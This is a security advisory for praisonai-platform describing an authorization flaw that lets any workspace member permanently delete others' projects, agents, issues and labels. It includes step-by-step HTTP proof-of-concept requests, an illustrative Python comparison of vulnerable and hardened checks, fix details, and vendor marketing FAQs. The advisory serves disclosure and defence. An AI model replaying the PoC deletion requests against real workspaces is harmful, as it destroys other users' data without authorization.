Summary
A workspace member can permanently delete any content resource (projects, agents, issues, labels, issue dependencies, and issue-label attachments) created by the workspace owner or other members. All six content DELETE endpoints enforce workspace membership but perform no ownership or role check. A single malicious or compromised member account can irreversibly wipe an entire workspace's content.
Details
The published role capability matrix explicitly restricts members from modifying others' content:
| Capability | Owner | Admin | Member |
|---|---|---|---|
| Create issues/tasks | ✅ | ✅ | ✅ |
| Edit own content | ✅ | ✅ | ✅ |
| Edit others' content | ✅ | ✅ | ❌ |
The DELETE handlers for all content resources check that the requesting user is a workspace member, but do not verify that the user either created the resource or holds an owner/admin role. The result is that the member role has unrestricted DELETE access over all workspace content regardless of who created it.
Confirmed vulnerable endpoints:
| Endpoint | Expected | Actual |
|---|---|---|
| DELETE /api/v1/workspaces/{workspace_id}/projects/{project_id} | 403 | 204 |
| DELETE /api/v1/workspaces/{workspace_id}/agents/{agent_id} | 403 | 204 |
| DELETE /api/v1/workspaces/{workspace_id}/issues/{issue_id} | 403 | 204 |
| DELETE /api/v1/workspaces/{workspace_id}/labels/{label_id} | 403 | 204 |
| DELETE /api/v1/workspaces/{workspace_id}/issues/{issue_id}/dependencies/{dep_id} | 403 | 204 |
| DELETE /api/v1/workspaces/{workspace_id}/issues/{issue_id}/labels/{label_id} | 403 | 204 |
The missing check is isolated to content resource DELETEs.
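The membership-only check beside the check the capability matrix actually calls for, as an added illustration that is not code from praisonai-platform. Names (`Membership`, `Resource`, `MEMBERSHIPS`, the user and workspace ids) are constructed for the example; `delete_status` maps each decision to the 204/403 outcomes from the table above.

```python
from dataclasses import dataclass
from typing import Callable, Optional

# Constructed model of a workspace's membership table and one content resource.
# Hypothetical names; this is not the praisonai-platform code base.

@dataclass(frozen=True)
class Membership:
    user_id: str
    workspace_id: str
    role: str  # "owner", "admin" or "member"

@dataclass(frozen=True)
class Resource:
    id: str
    workspace_id: str
    created_by: str  # user id of the creator

MEMBERSHIPS = {
    ("u-owner", "ws-1"): Membership("u-owner", "ws-1", "owner"),
    ("u-admin", "ws-1"): Membership("u-admin", "ws-1", "admin"),
    ("u-member", "ws-1"): Membership("u-member", "ws-1", "member"),
}
# Constructed sample project created by the workspace owner.
OWNER_PROJECT = Resource("proj-1", "ws-1", "u-owner")

def vulnerable_can_delete(user_id: str, resource: Resource) -> bool:
    """Membership-only check: any member may delete any resource in the workspace."""
    return (user_id, resource.workspace_id) in MEMBERSHIPS

def hardened_can_delete(user_id: str, resource: Resource) -> bool:
    """Membership plus role/ownership check matching the capability matrix:
    owners and admins may delete anything, members only their own content."""
    m: Optional[Membership] = MEMBERSHIPS.get((user_id, resource.workspace_id))
    if m is None:
        return False  # not a member of this workspace
    if m.role in ("owner", "admin"):
        return True
    return resource.created_by == user_id  # members: own content only

def delete_status(user_id: str, resource: Resource,
                  check: Callable[[str, Resource], bool]) -> int:
    """HTTP status a DELETE handler would return under the given check."""
    return 204 if check(user_id, resource) else 403

if __name__ == "__main__":
    print("vulnerable:", delete_status("u-member", OWNER_PROJECT, vulnerable_can_delete))
    print("hardened:  ", delete_status("u-member", OWNER_PROJECT, hardened_can_delete))
```

With the hardened check, the member's DELETE on the owner's project returns 403 while the owner's and admin's still return 204, and a member can still delete content they created themselves.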
PoC
Requirements: Two accounts, owner (resource creator) and member (attacker).
1. Register both accounts
POST /api/v1/auth/register
Content-Type: application/json
{"email": "[email protected]", "password": "Password1!", "name": "owner"}
POST /api/v1/auth/register
Content-Type: application/json
{"email": "[email protected]", "password": "Password1!", "name": "member"}
2. Owner creates workspace, adds member with member role
POST /api/v1/workspaces/
Authorization: Bearer <owner_token>
Content-Type: application/json
{"name": "Test Workspace"}
POST /api/v1/workspaces/{workspace_id}/members
Authorization: Bearer <owner_token>
Content-Type: application/json
{"user_id": "<member_user_id>", "role": "member"}
3. Owner creates a project
POST /api/v1/workspaces/{workspace_id}/projects/
Authorization: Bearer <owner_token>
Content-Type: application/json
{"title": "Owner's Project"}
Response 201 Created:
{"id": "29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6", "title": "Owner's Project", ...}
4. Member deletes the owner's project
DELETE /api/v1/workspaces/{workspace_id}/projects/29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6
Authorization: Bearer <member_token>
Response: 204 No Content
5. Owner confirms the project is permanently gone
GET /api/v1/workspaces/{workspace_id}/projects/29ce3e29-a6f0-4063-b0a2-d565b4f1c1a6
Authorization: Bearer <owner_token>
Response: 404 Not Found
{"detail": "Project not found"}
The same steps reproduce on all six affected resource types (agents, issues, labels, issue dependencies, issue-label attachments).
Impact
This is an improper authorization vulnerability. A workspace member can delete resources (projects, agents, issues, labels) created by other workspace members or the owner. The documented permission model restricts members to managing only their own content, but the DELETE endpoints do not enforce this.
Who is impacted: Workspace owners and members who share a workspace with untrusted or compromised member accounts.
GHSA-RH39-9C67-59MH has a CVSS score of 8.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.1.6); upgrading removes the vulnerable code path.
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-RH39-9C67-59MH? GHSA-RH39-9C67-59MH is a high-severity security vulnerability in praisonai-platform (pip), affecting versions = 0.1.4. It is fixed in 0.1.6.
- How severe is GHSA-RH39-9C67-59MH? GHSA-RH39-9C67-59MH has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of praisonai-platform are affected by GHSA-RH39-9C67-59MH? praisonai-platform (pip) versions = 0.1.4 is affected.
- Is there a fix for GHSA-RH39-9C67-59MH? Yes. GHSA-RH39-9C67-59MH is fixed in 0.1.6. Upgrade to this version or later.
- Is GHSA-RH39-9C67-59MH exploitable, and should I be worried? Whether GHSA-RH39-9C67-59MH is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether GHSA-RH39-9C67-59MH is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-RH39-9C67-59MH? Upgrade praisonai-platform to 0.1.6 or later.